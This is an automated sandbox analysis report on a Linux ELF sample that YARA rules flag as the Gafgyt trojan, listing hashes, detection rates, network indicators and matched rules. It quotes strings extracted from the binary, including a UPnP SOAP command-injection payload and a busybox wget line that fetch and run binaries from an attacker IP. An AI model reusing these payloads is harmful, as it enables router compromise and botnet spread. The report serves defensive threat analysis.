Linux Analysis Report
2FsS4ASMcO.elf

ID:	1531364
Product:	CloudBasic
Start time:	05:32:41
Start date:	11.10.2024
Sample:	2FsS4ASMcO.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	b19e780e32a0cf6b0ef1d14fbb939e55
SHA1:	488e09cf842d4e80c54e401a055edcc13dd3afdb
SHA256:	8dd0bc5b9880239d5e74934d37027a66b8a348d5ca3923fb97f1e4a8e9a79b5f
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Name	Type	MD5	SHA1	SHA256

AV Detection

Source: 2FsS4ASMcO.elf

Avira: detected

Source: 2FsS4ASMcO.elf	ReversingLabs: Detection: 68%
Source: 2FsS4ASMcO.elf	Virustotal: Detection: 61%			Perma Link

Networking

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: daisy.ubuntu.com

Source: 2FsS4ASMcO.elf	String found in binary or memory: http://107.175.31.202/bins/x86
Source: 2FsS4ASMcO.elf	String found in binary or memory: http://107.175.31.202/zyxel.sh;
Source: 2FsS4ASMcO.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 2FsS4ASMcO.elf	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Source: 2FsS4ASMcO.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 2FsS4ASMcO.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 5552.1.00007fba80017000.00007fba8002d000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: 5552.1.00007fba80017000.00007fba8002d000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: 2FsS4ASMcO.elf PID: 5552, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
Source: Process Memory Space: 2FsS4ASMcO.elf PID: 5552, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown

Source: Initial sample

String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 107.175.31.202 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: Initial sample

String containing 'busybox' found: /bin/busybox wget http://107.175.31.202/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Source: ELF static info symbol of initial sample

.symtab present: no

Source: 2FsS4ASMcO.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 2FsS4ASMcO.elf, type: SAMPLE	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 5552.1.00007fba80017000.00007fba8002d000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 5552.1.00007fba80017000.00007fba8002d000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: 2FsS4ASMcO.elf PID: 5552, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: 2FsS4ASMcO.elf PID: 5552, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16

Source: classification engine

Classification label: mal80.troj.linELF@0/0@2/0

Malware Analysis System Evasion

Source: /tmp/2FsS4ASMcO.elf (PID: 5552)

Queries kernel information via 'uname':

Jump to behavior

Source: 2FsS4ASMcO.elf, 5552.1.000055a9a54b0000.000055a9a55de000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/arm
Source: 2FsS4ASMcO.elf, 5552.1.00007fff4db6c000.00007fff4db8d000.rw-.sdmp	Binary or memory string: yx86_64/usr/bin/qemu-arm/tmp/2FsS4ASMcO.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/2FsS4ASMcO.elf
Source: 2FsS4ASMcO.elf, 5552.1.000055a9a54b0000.000055a9a55de000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: 2FsS4ASMcO.elf, 5552.1.00007fff4db6c000.00007fff4db8d000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: 2FsS4ASMcO.elf, 5552.1.00007fff4db6c000.00007fff4db8d000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Stealing of Sensitive Information

Source: Yara match	File source: 2FsS4ASMcO.elf, type: SAMPLE
Source: Yara match	File source: 5552.1.00007fba80017000.00007fba8002d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2FsS4ASMcO.elf PID: 5552, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 2FsS4ASMcO.elf, type: SAMPLE
Source: Yara match	File source: 5552.1.00007fba80017000.00007fba8002d000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2FsS4ASMcO.elf PID: 5552, type: MEMORYSTR